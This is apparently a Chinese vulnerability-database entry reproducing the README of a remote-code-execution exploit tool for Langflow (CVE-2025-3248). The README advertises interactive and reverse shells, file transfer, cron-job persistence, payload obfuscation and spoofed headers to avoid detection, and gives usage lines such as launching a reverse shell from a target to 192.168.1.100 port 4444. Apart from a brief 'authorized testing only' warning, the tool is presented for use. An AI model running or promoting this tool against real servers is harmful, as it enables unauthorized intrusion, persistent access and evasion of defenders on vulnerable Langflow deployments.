关联漏洞
标题:
Langflow 安全漏洞
(CVE-2025-3248)
描述:Langflow是Langflow开源的一个用于构建多代理和 RAG 应用程序的可视化框架。 Langflow 1.3.0之前版本存在安全漏洞,该漏洞源于/api/v1/validate/code端点存在代码注入漏洞,可能导致远程未经验证的攻击者执行任意代码。
描述
Remote Code Execution Exploit for Langflow (CVE-2025-3248) - [ By S4Tech ]
介绍
# Langflow RCE Exploit (CVE-2025-3248)
Remote Code Execution Exploit for Langflow (CVE-2025-3248)
## Features
- Automatic vulnerability detection
- Multiple exploitation modes:
- Interactive shell
- Single command execution
- Reverse shell connection
- File upload capability
- Colorized user interface
- Multiple reverse shell methods
- Command history persistence
## 📌 Changelog (v2.0)
### ✨ New Features:
- **Advanced payload system** with 5 execution methods
- **File upload/download** with Base64 encoding
- **Persistence** via cron jobs (`persist` command)
- **Interactive shell upgrades**:
- `upload local_path remote_path`
- `download remote_path local_path`
- `clear` command for terminal
### 🛡️ Security Enhancements:
- **Automatic payload obfuscation** (Base64 + random variants)
- **Header rotation** per request:
- Random `User-Agent`
- Spoofed `X-Forwarded-For` IPs
- **HTTPS bypass** (self-signed cert support)
- **No redirects** to avoid detection
### ⚡ Technical Improvements:
- **Multi-stage vulnerability verification**
- **Enhanced error handling** for unstable connections
- **Full session logging** to `exploit_log.txt`
- **Command history** persistence (`.langflow_shell_history`)
### 📊 Version Comparison:
| Feature | v1.0 | v2.0 |
|------------------------|--------------|--------------|
| Payload Methods | 1 | 5 |
| File Transfer | ❌ Not supported | ✅ Supported |
| Persistence | ❌ | ✅ |
| Stealth Level | Basic | Advanced |
| Session Logging | ❌ | ✅ |
### 🐛 Bug Fixes:
- Fixed HTTPS connection issues
- Improved handling of special characters in commands
- Stabilized reverse shell reliability
## Requirements
- Python 3.6 or newer
- Required libraries:
- `requests`
- `colorama`
- `readline`
## Installation
```bash
git clone https://github.com/0-d3y/langflow-rce-exploit.git
cd langflow-rce-exploit
pip install -r requirements.txt
```
## Usage
```bash
python exploit.py <URL> [options]
```
### Available Options:
| Option | Description |
|---------------------|-----------------------------------------------|
| `--shell` | Start interactive shell |
| `--reverse IP PORT` | Launch reverse shell to specified IP:PORT |
| `--command CMD` | Execute single command |
| `--verbose` | Enable verbose output |
| `--timeout SEC` | Set request timeout (default: 10s) |
### Examples:
1. Check vulnerability:
```bash
python exploit.py http://target.com
```
2. Start interactive shell:
```bash
python exploit.py http://target.com --shell
```
3. Execute single command:
```bash
python exploit.py http://target.com --command "whoami"
```
4. Launch reverse shell:
```bash
python exploit.py http://target.com --reverse 192.168.1.100 4444
```
## Screenshots
.png)
## Warning
âڑ ï¸ڈ This tool is for **educational and authorized testing purposes only**.
âڑ ï¸ڈ Unauthorized use against systems you don't own or have permission to test is illegal.
## License
This project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details.
## Author
- **Mr.SaMi**
[](https://twitter.com/Linux_ye)
[](https://instagram.com/s4tech.ye)
## Contributing
Pull requests are welcome. For major changes, please open an issue first to discuss what you would like to change.
文件快照
[4.0K] /data/pocs/16adf7c88402d2c37999b6b52826825af928c2ab
├── [9.5K] exploit.py
├── [100K] Langflow-Figure-1-updated (1).png
├── [ 1] output.txt
├── [4.0K] README.md
└── [ 66] requirements.txt
0 directories, 5 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。